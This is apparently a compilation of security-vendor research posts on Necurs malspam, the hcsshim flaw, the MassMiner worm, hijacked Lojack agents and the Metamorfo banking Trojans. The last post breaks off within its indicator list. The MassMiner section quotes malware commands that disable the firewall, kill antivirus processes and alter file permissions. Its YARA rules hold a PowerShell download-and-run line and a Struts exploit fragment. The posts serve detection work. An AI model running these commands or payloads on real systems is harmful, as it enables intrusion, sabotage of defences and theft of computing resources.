Internet Shortcut used in Necurs malspam campaign

The Necurs botnet continues to be one of the most prolific malicious spam distributors, with regular waves of carefully-crafted attachments that are used to download malware.

The majority of malspam campaigns that we track are targeting Microsoft Office with documents containing either macros or exploits. We also see a number of other types of malicious attachments that are zipped scripts (.VBS, .JS, etc)—essentially downloaders for the final payload.

In a new technique recently uncovered, Necurs is changing things up a little bit by avoiding the aforementioned formats and using a different file type instead, crafting malicious .URL files (Internet Shortcut).

This attack relies on the file:// protocol to load and execute a remote script from a samba (SMB) share. This is noteworthy because typically the attachment is used as a downloader, but instead here we see one additional step that pushes this function one degree further thanks to the .url shortcut.

By not placing the malicious script directly within the attachment, attackers are also preventing the automated collection and sandbox analysis that usually takes place within spam traps.

An obfuscated view of the WSF script can be seen in the screenshot below:

The final payload is eventually downloaded from a remote server:

This is an interesting attack designed to bypass traditional security measures and administrative policies that may block the well-known Office macros.

Malwarebytes users are already protected against this technique.

Malware authors are constantly looking for new evasion techniques as long as they generate good success rates. Social engineering attacks have relied upon the same lures for some time, but every now and again we see a slight variation in a technique that was perhaps known, but not yet leveraged by criminals.

The post Internet Shortcut used in Necurs malspam campaign appeared first on Malwarebytes Labs.

Go to Source
Author: Malwarebytes Labs

Microsoft Issues Emergency Patch For Critical Flaw In Windows Containers


Just a few days prior to its monthly patch release, Microsoft released an emergency patch for a critical vulnerability in the Windows Host Compute Service Shim (hcsshim) library that could allow remote attackers to run malicious code on Windows computers.

Windows Host Compute Service Shim (hcsshim) is an open source library that helps “Docker for Windows” execute Windows Server containers using a low-level container management API in Hyper-V.

Discovered by Swiss developer and security researcher Michael Hanselmann, the critical vulnerability (tracked as CVE-2018-8115) is the result of the failure of the hcsshim library to properly validate input when importing a Docker container image.

This, in turn, allows an attacker to remotely execute arbitrary code on the Windows host operating system, eventually letting the attacker create, remove, and replace files on the target host.

As Hanselmann explained in his personal blog, “Importing a Docker container image or pulling one from a remote registry isn’t commonly expected to make modifications to the host file system outside of the Docker-internal data structures.”

Hanselmann reported the issue to Microsoft in February this year, and the tech giant fixed the vulnerability a few days before this month’s patch Tuesday by releasing an updated version of hcsshim.

Although the vulnerability has been assigned a critical severity rating, Microsoft says exploitation of this issue is unlikely.

“To exploit the vulnerability, an attacker would place malicious code in a specially crafted container image which, if an authenticated administrator imported (pulled), could cause a container management service utilizing the Host Compute Service Shim library to execute malicious code on the Windows host,” Microsoft says in its advisory.

The patch for this vulnerability addresses the way hcsshim validates input from Docker container images, therefore blocking the loading of malicious code in specially crafted files.

An updated version 0.6.10 of the Windows Host Compute Service Shim (hcsshim) file is available right now for download from GitHub.

Full details of the vulnerability have not been released yet, but Hanselmann promises to publish in-depth technical details and a proof-of-concept exploit for the flaw on May 9, following an agreement with Microsoft security response center.

Microsoft’s May 2018 Patch Tuesday has been scheduled for release on May 8.

Go to Source

MassMiner Malware Targeting Web Servers

Written in collaboration wih Fernando Martinez

One of the biggest malware-trends of 2018 has been the increasing variety of crypto-currency malware targeting servers.

One family of mining malware, we’ve termed “MassMiner”, stands out as a worm that not only spreads itself through number of different exploits, but also brute-forces access to Microsoft SQL Servers. It surprised us how many different exploits and hacking tools it leverages in a single executable.

MassMiner spreads first within the local network, before attempting to propagate across the wider internet:

There are a number of different versions of MassMiner, and Honeypot data indicates they are continuing to spread:

An infected MassMiner machine attempting to spread, using an exploit for Apache Struts

This one site records infection attempts to their honeypots, most likely from infected systems, in the following countries:

It’s likely these numbers represent just a minority of the infected systems.


MassMiner includes a fork of MassScan, a tool that can scan the internet in under 6 minutes. The MassScan fork passes a list of IP ranges to scan during execution, which includes private and public IP ranges.


MassMiner then proceeds to run exploits against vulnerable systems, including:


Compromised Microsoft SQL Servers are subjected first to a script that installs MassMiner:

Installing MassMiner via SQL

Then to a 1000+ line SQL script that disables a number of important security features:

SQL Script disabling anti-virus protections

Whereas compromised Weblogic servers download MassMiner via PowerShell:

And a short VisualBasic script is used to deploy the malware to compromised Apache Struts servers:

Setting up the environment

Once the malware has been installed, it sets up the system to avoid detection and ensure persistence:

  • It copies itself to ‘C:Windowsimetaskhost.exe’ and the Startup folder for persistence

  • Schedules tasks to execute its components

  • Modifies ACL to grant full access to certain files in the system through running cacls.exe, with: cmd /c schtasks /create /sc minute /mo 1 /tn ‘Flashfxl’ /ru system /tr ‘cmd /c echo Y|cacls C:WindowsTEMPNetworkstaskmgr.exe /p everyone:F

  • Kills the Windows Firewall with: cmd /c net stop MpsSvc

Command and Control

MassMiner first downloads a configuration file from http://server/Cfg.ini

Cfg.ini sample from a slightly different variant of MassMiner to our primary sample

This specifies:

  • The server to download updates from;

  • The executable to infect other machines with; and

  • The Monero wallet and mining pool to send mined currency to

However, if the http request for the config file is never responded, the malware is capable of successfully running the Miner with its default configuration.

Gh0st Backdoor

A sample we analysed also installs the classic Gh0st backdoor, which communicates with the domain rat.kingminer[.]club.

Cashing Out

We’ve identified two Monero wallets belonging to the attackers:

  • 44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L

  • 49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi

Detection with OTX Threat Hunter

We recently released a free tool, OTX Threat Hunter, for hunting for indicators of compromise across hosts. Threat Hunter detects Mass Miner through:

  • File and Network based indicators (below, and in OTX)

  • Generic detection of communication with mining pool servers and execution of mining software

  • Yara rules (below)

AlienVault USM Detection

Rather than just detecting individual exploits and malware families, AlienVault USM detects high-level behaviours that change less often. A MassMiner infection will trigger the following detections:

  • Environmental Awareness – Suspicious Behavior – New Task Scheduled

  • Environmental Awareness – Security Critical Event – Windows Firewall Disabled

  • Environmental Awareness – Desktop Software – Bitcoin – Bitcoin Miner

  • Reconnaissance & Probing – Portscan – Nmap

  • Delivery & Attack – Brute Force Authentication – SQL Server

  • Delivery & Attack – Brute Force Authentication – MSSQL Server Login

  • Delivery & Attack – WebServer Attack – Code Execution

  • System Compromise – Suspicious Security Critical Event – Taskill killing Antivirus process

  • System Compromise – Suspicious Security Critical Event – Mass Process Killing

  • System Compromise – Suspicious Behavior – OTX Indicators of Compromise

And the following network detections:

  • Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) – Exploit Web Attack – Code Execution

  • Possible ETERNALBLUE Exploit M3 MS17-010 – Exploit – Code Execution – ETERNALBLUE

  • Weblogic XMLDecoder RCE (CVE-2017-10271) – Exploit – Code Execution

  • Executable Download from dotted-quad Host – Suspicious Activity – Executable download

  • PE EXE or DLL Windows file download HTTP – Suspicious Activity – Executable download

  • DRIVEBY Likely Evil EXE with no referer from HFS webserver (used by Unknown EK) – Malware – Exploit Kit

  • Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 – Suspicious Activity – Suspicious HTTP request

  • SUSPICIOUS Dotted Quad Host MZ Response – Suspicious Activity – Executable download

  • UPX compressed file download possible malware – Suspicious Activity – Executable download

  • EXE – Served Attached HTTP – Suspicious Activity – Executable download

  • NMAP -sS window 1024 – Recon – Scanner

  • Query to a *.top domain – Likely Hostile – Suspicious Activity – DNS Query – Suspicious TLD or domain

  • Unsupported/Fake Windows NT Version 5.0 – Suspicious Activity – Suspicious User-Agent

  • HTTP Request to a *.top domain – Suspicious Activity – HTTP Request – Suspicious TLD or domain

  • Cryptocurrency Miner Checkin – Policy Violation – Coin miner

We will follow up this blog with a detailed analysis on how to generically detect such cryo-currency mining activity with osquery and Sysmon. Stay Tuned!

Network Indicators







ppxvip1.ppxxmr[.]com (Mining Pool Server)

Sample Hashes



OTX Pulse

You can view the full set of indicators here.

Yara Rules

rule massminer_sql_downloader {


       author = “AlienVault Labs”

       copyright = “Alienvault Inc. 2018”

       license = “Apache License, Version 2.0”

       md5 = “f2b546f172c1162dbf719596b053dfd9”


       $a = “SaveToFile(“C:\Windows\temp\searsvc.exe”)” nocase wide ascii

       $b = “master.dbo.xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1” nocase wide ascii


       any of them


rule massminer_sql_installation_script {


       author = “AlienVault Labs”

       copyright = “Alienvault Inc. 2018”

       license = “Apache License, Version 2.0”

       md5 = “864802dfd37882b0d306b1fe9b2459a2”


       $a = “secedit /configure /db secedit.sdb /cfg FuckGOthin.inf” nocase wide ascii

       $b = “c:\windows\system32\wbem\vice.exe taskkill.EXE /e /t /g system:F’;exec sp_OAMethod @passwordftpcov” nocase wide ascii

       $c = “657865632073705F636F6E666967757265202773686F7720616476616E636564206F7074696F” nocase wide ascii

       $d = “taskkill /f /im 360safe.exe&taskkill /f /im 360sd.exe&taskkill /f /im 360rp.exe&taskkill /f /im 360rps.exe&taskkill /f /im 360tray.exe&taskkill /f /im ZhuDongFangYu&exit” nocase wide ascii


       any of them


rule massminer_sqlack_bruteforcer {


       author = “AlienVault Labs”

       copyright = “Alienvault Inc. 2018”

       license = “Apache License, Version 2.0”

       md5 = “755830fa887efe3adfe177f774089510”


       $a = “SQLck -i IP.txt -p Pass.txt -o output.txt” nocase wide ascii

       $b = “d:\STORAGE\niemic\Documents\Visual Studio Projects\” nocase wide ascii

       $c = “This is a tool for auditing the strength of your SQL login passwords” nocase wide ascii


       any of them


rule massminer_sqlack_passwordlist {


       author = “AlienVault Labs”

       copyright = “Alienvault Inc. 2018”

       license = “Apache License, Version 2.0”

       md5 = “a13f4d7e95c6429bd3cdcfa4bda1a50b”


       $a = “1qa2ws3ed” nocase wide ascii

       $b = “2sqlserver2000” nocase wide ascii

       $c = “qwertyuiop[” nocase wide ascii

       $d = “1qaz2wsx3edc” nocase wide ascii

       $e = “QQ976428697” nocase wide ascii


       all of them


rule massminer_eternalblue_downloader {


       author = “AlienVault Labs”

       copyright = “Alienvault Inc. 2018”

       license = “Apache License, Version 2.0”

       md5 = “af0e08bff4ac83d29f71880b74abde5e”


       $a = “\1\x64\Release\1.pdb” nocase wide ascii

       $b = “C:\Windows\downloader.exe” nocase wide ascii


       any of them


rule massminer_eternalblue_configs {


       author = “AlienVault Labs”

       copyright = “Alienvault Inc. 2018”

       license = “Apache License, Version 2.0”

       md5 = “09d45ae26830115fd8d9cdc2aa640ca5”


       $a = “Full path to the file containing Double Pulsar shellcode installer” nocase wide ascii

       $b = “Set to true if the DOUBLEPULSAR backdoor was already installed and the exploit did not have to be thrown” nocase wide ascii


       any of them


rule massminer_eternalblue_exploit_one {


       author = “AlienVault Labs”

       copyright = “Alienvault Inc. 2018”

       license = “Apache License, Version 2.0”

       md5 = “08b6c44e03bf6648a09c80dd73655e18”


       $a = “CNEFileIO_fileGetSizeByNameExWWithFileAccess” nocase wide ascii


       any of them


rule massminer_eternalblue_exploit_three {


       author = “AlienVault Labs”

       copyright = “Alienvault Inc. 2018”

       license = “Apache License, Version 2.0”

       md5 = “cf2a5731ec9c93227dadcfe3d539943e”


       $a = “coli_create” nocase wide ascii

       $b = “coli_delete” nocase wide ascii

       $c = “coli_setCleanup” nocase wide ascii

       $d = “coli_setID” nocase wide ascii

       $e = “coli_setProcess” nocase wide ascii

       $f = “coli_setValidatex” nocase wide ascii


       all of them


rule massminer_externalblue_exploit_four {


       author = “AlienVault Labs”

       copyright = “Alienvault Inc. 2018”

       license = “Apache License, Version 2.0”

       md5 = “22bb1452ca9bc4b8d346368d3f4db6c2”


       $a = “coli-0.dll” nocase wide ascii

       $b = “coli_setID” nocase wide ascii

       $c = “trch-1.dll” nocase wide ascii


       all of them


rule massminer_gh0st {


       author = “AlienVault Labs”

       copyright = “Alienvault Inc. 2018”

       license = “Apache License, Version 2.0”

       md5 = “d4591a075422948408d5fc7d33df31b3”


       $a = “Jklmnopq Stuvwxyab Defghij Lmnopqrs Uvw” nocase wide ascii

       $b = “Local AppWizard-Generated Applications” nocase wide ascii


       all of them


rule massminer_xmrig_miner {


       author = “AlienVault Labs”

       copyright = “Alienvault Inc. 2018”

       license = “Apache License, Version 2.0”

       md5 = “458a2b86b2c610cc66b3aa081c45584b”


       $a = “number of times to retry before switch to backup server” nocase wide ascii

       $b = “Huge pages support was successfully enabled, but reboot required to use it” nocase wide ascii


       all of them


rule massminer_xmrig_config {


       author = “AlienVault Labs”

       copyright = “Alienvault Inc. 2018”

       license = “Apache License, Version 2.0”

       md5 = “490fb7bd62699dadef26dac8e88eefa3”


       $a = “max-cpu-usage” nocase wide ascii

       $b = “keepalive” nocase wide ascii

       $c = “access-token” nocase wide ascii

       $d = “cpu-affinity” nocase wide ascii


       all of them


rule massminer_weblogic_exploit_downloader {


       author = “AlienVault Labs”

       copyright = “Alienvault Inc. 2018”

       license = “Apache License, Version 2.0”


       $a = “powershell (new-object System.Net.WebClient).DownloadFile(‘AAAAA’,’BBBBB’);start BBBBB” nocase wide ascii


       any of them


rule massminer_massscan_xiugaijson_fork {


       author = “AlienVault Labs”

       copyright = “Alienvault Inc. 2018”

       license = “Apache License, Version 2.0”

       md5 = “83ab969950c7d47e4de3ab82d7c0a62f”


       $a = “masscan-master-xiugaijson\bin\masscan.pdb” nocase wide ascii


       any of them


rule massminer_struts_exploit_downloader {


       author = “AlienVault Labs”

       copyright = “Alienvault Inc. 2018”

       license = “Apache License, Version 2.0”


       $a = “(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds))” nocase wide ascii


       any of them



Go to Source

Lojack Becomes a Double-Agent

Executive Summary

ASERT recently discovered Lojack agents containing malicious C2s. These hijacked agents pointed to suspected Fancy Bear (a.k.a. APT28, Pawn Storm) domains.  The InfoSec community and the U.S. government have both attributed Fancy Bear activity to Russian espionage activity.  Fancy Bear actors typically choose geopolitical targets, such as governments and international organizations. They also target industries that do business with such organizations, such as defense contractors.  Lojack, formally known as Computrace, is a legitimate laptop recovery solution used by a number of companies to protect their assets should they be stolen.  Lojack makes an excellent double-agent due to appearing as legit software while natively allowing remote code execution. Although the initial intrusion vector for this activity remains unknown, Fancy Bear often utilizes phishing email to deliver payloads.


NOTE: Arbor APS enterprise security products detect and block on all activity noted in this report.

Key Findings

  • ASERT researchers identified Lojack agents containing command and control (C2) domains likely associated with Fancy Bear operations.
  • Proof of concept in using Lojack as a backdoor or intrusion vector date back to 2014. Its continued use suggest attackers could have used it in long-running operations.
  • Initially, the Lojack agents containing rogue C2 had low Anti-Virus (AV) detection which increased the probability of infection and subsequent successful C2 communication.
  • The distribution mechanism for the malicious Lojack samples remains unknown. However, Fancy Bear commonly uses phishing to deliver malware payloads as seen with Sedupload in late 2017.


May 3, 2018 – After the disclosure of the malicious Lojack binaries, many Anti-Virus vendors have been quick to respond in properly marking samples as “malware” and “DoubleAgent”, rather than “Riskware” or “unsafe” (Figure 2).

Lojack Summary

Absolute Software, the creator of Lojack, says on its website ( that the agent can locate and lock a device remotely.  Additionally, it can delete files, making it an effective laptop theft recovery and data wiping platform.  Lojack can survive hard drive replacements and operating system (OS) re-imaging.  The agent achieves this persistence through a modular design as noted by Vitaliy Kamlyuk, Sergey Belov, and Anibal Sacco in a presentation at Blackhat, 2014 (Figure 1):

Figure 1: Lojack persistence mechanism (Paraphrased from

The aforementioned researchers suggest the binary modification of the “small agent” is trivial.  The Lojack agent protects the hardcoded C2 URL using a single byte XOR key; however, according to researchers it blindly trusts the configuration content.  Once an attacker properly modifies this value then the double-agent is ready to go.  This is not the only aspect that makes Lojack an appealing target.  Attackers are also concerned about AV detection.  Looking on VirusTotal, some anti-virus vendors flag Lojack executables as ”unsafe”, but as noted as of May 3, many AV now flag the binaries as malware and DoubleAgent (Figure 2).

Figure 2: Virustotal AV Report of cf45ec807321d12f8df35fa434591460

Originally, the low AV detection, allowed the attacker to hide in plain sight, an effective double-agent. The attacker simply needs to stand up a rogue C2 server that simulates the Lojack communication protocols. Finally, Lojack’s “small agent” allows for memory reads and writes which grant it remote backdoor functionality when coupled with a rogue C2 server.

Lojack Double-Agent

ASERT has identified five Lojack agents (rpcnetp.exe) pointing to 4 different suspected domains.  Fancy Bear has been tied to three of the domains in the past.

Hash Compilation Time Size in Bytes Rogue C2 Servers AV Detection on VT
f1df1a795eb784f7bfc3ba9a7e3b00ac 2008-04-01 19:35:07 17,408 sysanalyticweb[.]com 2/67
6eaa1ff5f33df3169c209f98cc5012d0 2008-04-01 19:35:07 17,408 sysanalyticweb[.]com 4/66
f3c6e16f0dd2b0e55a7dad365c3877d4 2008-04-01 19:35:07 17,408 elaxo[.]org 3/62
cf45ec807321d12f8df35fa434591460 2008-04-01 19:35:07 17,408 ikmtrust[.]com 2/64
f391556d9f89499fa8ee757cb3472710 2008-04-01 19:35:07 17,408 lxwo[.]org 9/65

Table 1: Lojack Double-Agents on VirusTotal


Binary Comparisons

ASERT believes all these binaries are rpcnetp.exe (small agent) due to the following characteristics:

  • Size matching: 17,408 bytes
  • Yara match on either:
    • “TagId” and “rpcnetp.exe”
    • Set of op codes
  • Matching export function “rpcnetp” in the binaries.

After confirming the stage of the Lojack agent, binary comparison analysis confirmed that they were legitimate Lojack samples.  The comparison also highlighted that the attacker did not graft additional functionality into the binary.  ASERT used the presence of search.namequery[.]com in the binary and the yara rule to identify legitimate Lojack samples.  Lojack’s Absolute Software Corp. owns search.namequery[.]com; we have no evidence the legitimate site has been used for nefarious purposes.

NOTEAll samples, both rogue and the two “clean” samples (below), matched 100% based on Diaphora’s function matching algorithm.

“Clean” Samples:

  1. e78e3b0171b189074d2539c7baaa0719
  2. ac1a85d3ca1b6265cad4ed41b696f9b7

Only the presence of the rogue C2’s make the samples in Table 1malicious. The attackers are merely hijacking the communication used by Lojack, thereby granting themselves backdoor access to machines running the software.

Fancy Bear Attribution

ASERT assesses with moderate confidence that the rogue Lojack agents are attributed to Fancy Bear based on shared infrastructure with previous operations. The following domains, extracted from the rogue Lojack agents trace back to Fancy Bear operations:

  1. elaxo[.]org
  2. ikmtrust[.]com
  3. lxwo[.]org
  4. sysanalyticweb[.]com (Figure 3 & Figure 4)

Researchers from Jigsaw Security, based on leads from Talos in late 2017, traced the domains elaxo[.]org and ikmtrust[.]com and the tool Sedupload, to a Fancy Bear operation.  The domain lxwo[.]org appeared in a blog post from Threat Intel Recon that resolved to an IP address within a document attributed to Fancy Bear.  The rogue Lojack samples containing the sysanalyticweb[.]com domains were only recently spotted in the wild (April 2018).

Despite the hijack of this software being a publicly known tactic, there are many similarities in the binary comparisons (above) and infrastructure analysis (below) that increase the probability it is the same actor(s):

  • All the listed domains are associated with the same Lojack agent utilizing the same compile time.
  • The domains in question all contain nonsensical Registrant information where the actor tends to copy/paste the same information in multiple fields.
  • Each domain includes a Registrant Name (often a nonsensical word), but additionally includes a similar word in the Registrant Organization field.
    • This is interesting because that is a field that is often skipped when a Registrant Name is present, but this actor(s) regularly utilizes both fields


Figure 3. XORed C2 Server – NETSCOUT


Figure 4. Live (April 2018) C2 – NETSCOUT

Conclusion & Recommendations

Hijacking legitimate software is a common enough tactic for malicious actors. A key factor making this activity so devious is the malicious Lojack samples were simply labeled “unsafe”, “suspicious”, or “DangerousObject”, rather than malware. As a result, rogue Lojack samples could fly under the radar and give attackers a stealthy backdoor into victim systems.

ASERT recommends scanning for rogue Lojack agents using the Yara signature listed in the Appendix (below) and blocking the domains contained within this blog.

Go to Source
Author: ASERT team

Metamorfo Campaigns Targeting Brazilian Users

FireEye Labs recently identified several widespread malspam (malware
spam) campaigns targeting Brazilian companies with the goal of
delivering banking Trojans. We are referring to these campaigns as
Metamorfo. Across the stages of these campaigns, we have observed the
use of several tactics and techniques to evade detection and deliver
the malicious payload. In this blog post we dissect two of the main
campaigns and explain how they work.

Campaign #1

The kill chain starts with an email containing an HTML attachment
with a refresh tag that uses a Google URL shortener as the
target. Figure 1 shows a sample email, and Figure 2 show the contents
of the HTML file.

Figure 1: Malicious Email with HTML Attachment

Figure 2: Contents of HTML File

When the URL is loaded, it redirects the victim to a cloud storage
site such as GitHub, Dropbox, or Google Drive to download a ZIP
file. An example is shown in Figure 3.

Figure 3: URL Shortener Redirects to
Github Link

The ZIP archive contains a malicious portable executable (PE) file
with embedded HTML application (HTA). The user has to unzip the
archive and double-click the executable for the infection chain to
continue. The PE file is a simple HTA script compiled into an
executable. When the user double-clicks the executable, the malicious
HTA file is extracted to %temp% and executed by mshta.exe.

The HTA script (Figure 4) contains VBS code that fetches a second
blob of VBS code encoded in base64 form from hxxp:///ilha/pz/logs.php.

Figure 4: Contents of HTA File

After the second stage of VBS is decoded (Figure 5 and Figure 6),
the script downloads the final stage from hxxp:///28022018/

Figure 5: Contents of Decoded VBS

Figure 6: More Contents of Decoded VBS

The downloaded ZIP file contains four files. Two are PE files. One
is a legitimate Windows tool, pvk2pfx.exe, that is abused
for DLL side-loading. One is the malicious banking Trojan as the DLL.

The VBS code unzips the archive, changes the extension of the
legitimate Windows tool from .png to .exe, and renames the malicious
DLL as cryptui.dll. The VBS code also creates a file in
C:UsersPublicAdministradorcar.dat with random strings. These
random strings are used to name the Windows tool, which is then
executed. Since this tool depends on a legitimate DLL named
cryptui.dll, the search order path will find the malicious Trojan with
the same name in the same directory and load it into its process space.

In Q4 of 2017, a similar malspam campaign delivered the same banking
Trojan by using an embedded JAR file attached in the email instead of
an HTML attachment. On execution, the Java code downloaded a ZIP
archive from a cloud file hosting site such as Google Drive, Dropbox,
or Github. The ZIP archive contained a legitimate Microsoft tool and
the malicious Trojan.

Banking Trojan Analysis

The Trojan expects to be located in the hardcoded directory
C:\Users\PublicAdministrador\ along with three other files to
start execution. As seen in Figure 7, these files are:

  • car.dat (randomly
    generated name given to Windows tool)
  • i4.dt (VBS script
    that downloads the same zip file)
  • id (ID given to
  • cryptui.dll (malicious Trojan)

Figure 7: Contents of ZIP Archive


The string found in the file
C:\Users\Public\Administrador\car.dat is extracted and used to add
the registry key
SoftwareMicrosoftWindowsCurrentVersionRun for persistence, as shown in Figure 8.

Figure 8: Reading from car.dat File

The sample also looks for a file named i4.dt in the same directory
and extracts the contents of it, renames the file to icone.vbs, and
creates a new persistent key (Figure 9) in
SoftwareMicrosoftWindowsCurrentVersionRun to open this file.

Figure 9: Persistence Keys

The VBS code in this file (Figure 10) has the ability to recreate
the whole chain and download the same ZIP archive.

Figure 10: Contents of VBS Script

Next, the Trojan searches for several folders in the Program Files
directories, including:

  • C:\Program
  • C:\Program Files\AVAST Software
  • C:\Program Files\Diebold\Warsaw
  • C:\Program
  • C:\Program Files\Java
  • C:\Program Files (x86)\scpbrad

If any of the folders are found, this information, along with the
hostname and Operating System version, is sent to a hardcoded domain
with the hardcoded User-Agent value “Mozilla/5.0 (Windows NT 6.1;
WOW64; rv:12.0) Gecko/20100101 Firefox/12.0” in the format shown in
Figure 11. The value of AT is “<host_name+OS&MD>=”.

Figure 11: Network Traffic for Host Enumeration

The sample iterates through the running processes, kills the
following, and prevents them from launching:

  • msconfig.exe
  • TASKMGR.exe
  • regedit.exe
  • ccleaner64.exe
  • taskmgr.exe
  • itauaplicativo.exe

Next, it uses GetForegroundWindow to get a handle to the window the
user is viewing and GetWindowText to extract the title of the window.
The title is compared against a hardcoded list of Brazilian banking
and digital coin sites. The list is extensive and includes major
organizations and smaller entities alike.

If any of those names are found and the browser is one of the
following, the Trojan will terminate that browser.

  • firefox.exe
  • chrome.exe
  • opera.exe
  • safari.exe

The folder C:UsersPublicAdministradorlogs is created to store
screenshots, as well as the number of mouse clicks the user has
triggered while browsing the banking sites (Figure 12). The
screenshots are continuously saved as .jpg images.

Figure 12: Malware Capturing Mouse Clicks

Command and Control

The command and control (C2) server is selected based on the string
in the file “id”:

  • al ->
  • gr -> ‘212.237.46[.]6’
  • pz
    -> ‘87.98.146[.]34’
  • mn -> ’80.211.140[.]235′

The connection to one of the hosts is then started over raw TCP on
port 9999. The command and control communication generally follows the
pattern <|Command |>, for example:

  • ‘<|dispida|>logs>SAVE<‘ sends the screenshots
    collected in gh.txt.
  • ” is sent from C2 to
    host, and ” is sent from host to C2, to keep the
    connection alive.
  • ‘<|INFO|>’ retrieves when the
    infection first started based on the file timestamp from car.dat
    along with ‘<|>’ and the host information.

There were only four possible IP addresses that the sample analyzed
could connect to based on the strings found in the file “id”. After
further researching the associated infrastructure of the C2 (Figure
13), we were able to find potential number of victims for this
particular campaign.

Figure 13: Command and Control Server Open Directories

Inside the open directories, we were able to get the following
directories corresponding to the different active campaigns. Inside
each directory we could find statistics with the number of victims
reporting to the C2. As of 3/27/2018, the numbers were:

  • al – 843
  • ap –
  • gr – 397
  • kk – 2,153
  • mn – 296
  • pz – 536
  • tm – 187

A diagram summarizing Campaign #1 is shown in Figure 14.

Figure 14: Infection Chain of Campaign #1

Campaign #2

In the second campaign, FireEye Labs observed emails with links to
legitimate domains (such as
or compromised domains (such
as hxxps://curetusu.-industria[.]site/) that use a
refresh tag with a URL shortener as the target.
The URL shortener redirects the user to an online storage site, such
as Google Drive, Github, or Dropbox, that hosts a malicious ZIP
file. A sample phishing email is shown in Figure 15.

Figure 15: Example Phishing Email

The ZIP file contains a malicious executable written in AutoIt
(contents of this executable are shown in Figur 16). When executed by
the user, it drops a VBS file to a randomly created and named
directory (such as C:mYPdrTkCJLQPXHwoCmYPdr.vbs) and fetches
contents from the C2 server.

Figure 16: Contents of Malicious AutoIt Executable

Two files are downloaded from the C2 server. One is a legitimate
Microsoft tool and the other is a malicious DLL:

  • https[:]//panel-dark[.]com/w3af/img2.jpg
  • https[:]//panel-dark[.]com/w3af/img1.jpg

Those files are downloaded and saved into random directories named
with the following patterns:

  • <5 random chars><8 random chars><4 random chars><5 random chars>.exe
  • <5 random chars><8 random chars><4 random chars>CRYPTUI.dll

The execution chain ensures that persistence is set on the affected
system using a .lnk file in the Startup directory. The .lnk file shown
in Figure 17 opens the malicious VBS dropped on the system.

Figure 17: Persistence Key

The VBS file (Figure 18) will launch and execute the downloaded
legitimate Windows tool, which in this case is Certmgr.exe. This tool
will be abused using the DLL side loading technique. The malicious
Cryptui.dll is loaded into the program instead of the legitimate one
and executed.

Figure 18: Contents of Dropped VBS File

Banking Trojan Analysis

Like the Trojan from the first campaign, this sample is executed
through search-order hijacking. In this case, the binary abused is a
legitimate Windows tool, Certmgr.exe, that loads Cryptui.dll. Since
this tool depends on a legitimate DLL named cryptui.dll, the search
order path will find the malicious Trojan with the same name in the
same directory and load it into its process space.

The malicious DLL exports 21 functions. Only DllEntryPoint contains
real code that is necessary to start the execution of the malicious
code. The other functions return hardcoded values that serve no real purpose.

On execution, the Trojan creates a mutex called
“correria24” to allow only one instance of it to run at a time.

The malware attempts to resolve “www.goole[.]com” (most likely a
misspelling). If successful, it sends a request to
hxxp://api-api[.]com/json in order to detect the external IP of the
victim. The result is parsed and execution continues only if the
country code matches “BR”, as shown in Figure 19.

Figure 19: Country Code Check

The malware creates an empty file in %appdata%Mariapeirura on first
execution, which serves as a mutex lock, before attempting to send any
collected information to the C2 server. This is done in order to get
only one report per infected host.

The malware collects host information, base64 encodes it, and sends
it to two C2 servers. The following items are gathered from the
infected system:

  • OS name
  • OS
  • OS architecture
  • AV installed
  • List
    of banking software installed
  • IP address
  • Directory
    where malware is being executed from

The information is sent to hxxp:// (Figure 20).

Figure 20: Host Recon Data Sent to First
C2 Server

The same information is sent to panel-dark[.]com/Contador/put.php
(Figure 21).

Figure 21: Host Recon Data Sent to Second
C2 Server

The malware alters the value of registry key
to 2710 in order to change the number of milliseconds a thumbnail is
showed while hovering on the taskbar, as seen in Figure 22.

Figure 22: ExtendedUIHoverTime Registry
Key Change

Like the Trojan from the first campaign, this sample checks if the
foreground window’s title contains names of Brazilian banks and
digital coins by looking for hardcoded strings.

The malware displays fake forms on top of the banking sites and
intercepts credentials from the victims. It can also display a fake
Windows Update whenever there is nefarious activity in the background,
as seen in Figure 23.

Figure 23: Fake Form Displaying Windows Update

The sample also contains a keylogger functionality, as shown in
Figure 24.

Figure 24: Keylogger Function

Command and Control

The Trojan’s command and control command structure is identical to
the first sample. The commands are denoted by the <|Command|> syntax.

  • <|OK|> gets a list
    of banking software installed on the host.

  • is sent from C2 to host, and ” is sent from host to C2,
    to keep connection alive.
  • <|dellLemb|> deletes the
    registry key SoftwareMicrosoftInternet Explorernotes.
  • EXECPROGAM calls ShellExecute to run the application given in
    the command.
  • EXITEWINDOWS calls ExitWindowsEx.
  • NOVOLEMBRETE creates and stores data sent with the command in
    the registry key SoftwareMicrosoftInternet Explorernotes.

Figure 25: Partial List of Victims

This sample contains most of the important strings encrypted. We
provide the following script (Figure 26) in order to decrypt them.

Figure 26: String Decryption Script


The use of multi-stage infection chains makes it challenging to
research these types of campaigns all the way through.

As demonstrated by our research, the attackers are using various
techniques to evade detection and infect unsuspecting
Portuguese-speaking users with banking Trojans. The use of public
cloud infrastructure to help deliver the different stages plays a
particularly big role in delivering the malicious payload. The use of
different infection methods combined with the abuse of legitimate
signed binaries to load malicious code makes these campaigns worth highlighting.

Indicators of Compromise

Campaign #1
MD5 860fa744d8c82859b41e00761c6e25f3 PE with Embedded HTA
MD5 3e9622d1a6d7b924cefe7d3458070d98 PE with Embedded HTA
MD5 f402a482fd96b0a583be2a265acd5e74 PE with Embedded HTA
MD5 f329107f795654bfc62374f8930d1e12 PE with Embedded HTA
MD5 789a021c051651dbc9e01c5d8c0ce129 PE with Embedded HTA
MD5 68f818fa156d45889f36aeca5dc75a81 PE with Embedded HTA
MD5 c2cc04be25f227b13bcb0b1d9811e2fe cryptui.dll
MD5 6d2cb9e726c9fac0fb36afc377be3aec id
MD5 dd73f749d40146b6c0d2759ba78b1764 i4.dt
MD5 d9d1e72165601012b9d959bd250997b3 VBS file with commands to create staging directories for
